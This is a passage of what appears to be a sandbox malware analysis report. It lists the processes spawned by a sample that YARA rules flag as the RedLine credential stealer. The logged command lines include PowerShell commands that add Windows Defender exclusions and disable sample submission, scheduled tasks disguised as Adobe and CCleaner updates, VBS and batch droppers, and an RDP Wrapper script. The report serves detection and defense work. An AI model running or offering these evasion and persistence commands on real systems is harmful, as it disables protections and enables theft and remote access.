                                                                              Commandline:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com f
                                                                              Imagebase:0xa00000
                                                                              File size:943'784 bytes
                                                                              MD5 hash:78BA0653A340BAC5FF152B21A83626CC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:13
                                                                              Start time:02:19:00
                                                                              Start date:27/12/2024
                                                                              Path:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com
                                                                              Wow64 process (32bit):true
                                                                              Commandline:Inebriato.exe.com R
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:943'784 bytes
                                                                              MD5 hash:78BA0653A340BAC5FF152B21A83626CC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 5%, ReversingLabs
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:02:19:00
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\PING.EXE
                                                                              Wow64 process (32bit):true
                                                                              Commandline:ping 127.0.0.1 -n 30
                                                                              Imagebase:0x580000
                                                                              File size:18'944 bytes
                                                                              MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:02:19:00
                                                                              Start date:27/12/2024
                                                                              Path:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com R
                                                                              Imagebase:0x5a0000
                                                                              File size:943'784 bytes
                                                                              MD5 hash:78BA0653A340BAC5FF152B21A83626CC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:19
                                                                              Start time:02:19:20
                                                                              Start date:27/12/2024
                                                                              Path:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              Imagebase:0x4a0000
                                                                              File size:65'440 bytes
                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000013.00000002.2943468774.0000000000582000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                              Antivirus matches:
                                                                              • Detection: 0%, ReversingLabs
                                                                              Has exited:false

                                                                              Target ID:20
                                                                              Start time:02:19:36
                                                                              Start date:27/12/2024
                                                                              Path:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              Imagebase:0x8d0000
                                                                              File size:65'440 bytes
                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:21
                                                                              Start time:02:19:43
                                                                              Start date:27/12/2024
                                                                              Path:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
                                                                              Imagebase:0x7b0000
                                                                              File size:65'440 bytes
                                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:23
                                                                              Start time:02:20:29
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:24
                                                                              Start time:02:20:29
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:25
                                                                              Start time:02:20:29
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
                                                                              Imagebase:0xd40000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:27
                                                                              Start time:02:20:32
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:28
                                                                              Start time:02:20:32
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:29
                                                                              Start time:02:20:32
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
                                                                              Imagebase:0xd40000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:30
                                                                              Start time:02:20:34
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:31
                                                                              Start time:02:20:34
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:32
                                                                              Start time:02:20:34
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
                                                                              Imagebase:0x7ff6ec4b0000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:33
                                                                              Start time:02:20:37
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe""
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:34
                                                                              Start time:02:20:37
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:35
                                                                              Start time:02:20:37
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
                                                                              Imagebase:0xd40000
                                                                              File size:433'152 bytes
                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:36
                                                                              Start time:02:20:39
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:37
                                                                              Start time:02:20:39
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:38
                                                                              Start time:02:20:39
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cscript.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\1186.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs
                                                                              Imagebase:0x930000
                                                                              File size:144'896 bytes
                                                                              MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:39
                                                                              Start time:02:20:40
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:40
                                                                              Start time:02:20:40
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:41
                                                                              Start time:02:20:40
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cscript.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\54.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
                                                                              Imagebase:0x930000
                                                                              File size:144'896 bytes
                                                                              MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:42
                                                                              Start time:02:20:41
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:43
                                                                              Start time:02:20:41
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:44
                                                                              Start time:02:20:41
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "Adobe Acrobat Update Task53"
                                                                              Imagebase:0xc50000
                                                                              File size:187'904 bytes
                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:45
                                                                              Start time:02:20:41
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:46
                                                                              Start time:02:20:41
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:47
                                                                              Start time:02:20:41
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cscript.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cscript.exe "C:\Users\user\AppData\Roaming\UeNuQ\400.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs" "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll"
                                                                              Imagebase:0x930000
                                                                              File size:144'896 bytes
                                                                              MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:48
                                                                              Start time:02:20:42
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79"
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:49
                                                                              Start time:02:20:42
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:50
                                                                              Start time:02:20:42
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:schtasks.exe /Create /XML "C:\Users\user\AppData\Roaming\UeNuQ\RBV.dll" /tn "CCleaner Update79"
                                                                              Imagebase:0xc50000
                                                                              File size:187'904 bytes
                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:51
                                                                              Start time:02:20:43
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\UeNuQ\578.vbs" fsUIwEqMAc zyTFxcsIkA "C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat"
                                                                              Imagebase:0x7ff79da90000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:52
                                                                              Start time:02:20:43
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\wscript.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\UeNuQ\939.vbs"
                                                                              Imagebase:0x7ff79da90000
                                                                              File size:170'496 bytes
                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:53
                                                                              Start time:02:20:43
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Roaming\UeNuQ\UILIklkzCJ.bat fsUIwEqMAc zyTFxcsIkA"
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:54
                                                                              Start time:02:20:43
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:55
                                                                              Start time:02:20:43
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:56
                                                                              Start time:02:20:43
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:wmic group where sid="S-1-5-32-544" get name /value
                                                                              Imagebase:0x7b0000
                                                                              File size:427'008 bytes
                                                                              MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:57
                                                                              Start time:02:20:45
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\UeNuQ\BACCrSAh.bat
                                                                              Imagebase:0x7ff7c9e40000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:58
                                                                              Start time:02:20:45
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:59
                                                                              Start time:02:20:45
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
                                                                              Imagebase:0x7ff7c9e40000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:60
                                                                              Start time:02:20:45
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\wbem\WMIC.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:wmic group where sid="S-1-5-32-544" get name /value
                                                                              Imagebase:0x7ff692340000
                                                                              File size:576'000 bytes
                                                                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:61
                                                                              Start time:02:20:47
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
                                                                              Imagebase:0x7ff71e800000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:62
                                                                              Start time:02:20:47
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:wmic group where sid="S-1-5-32-555" get name /value
                                                                              Imagebase:0x7b0000
                                                                              File size:427'008 bytes
                                                                              MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:63
                                                                              Start time:02:20:48
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files\RDP Wrapper\rdpwrap.bat" "
                                                                              Imagebase:0x7ff7c9e40000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Target ID:64
                                                                              Start time:02:20:48
                                                                              Start date:27/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
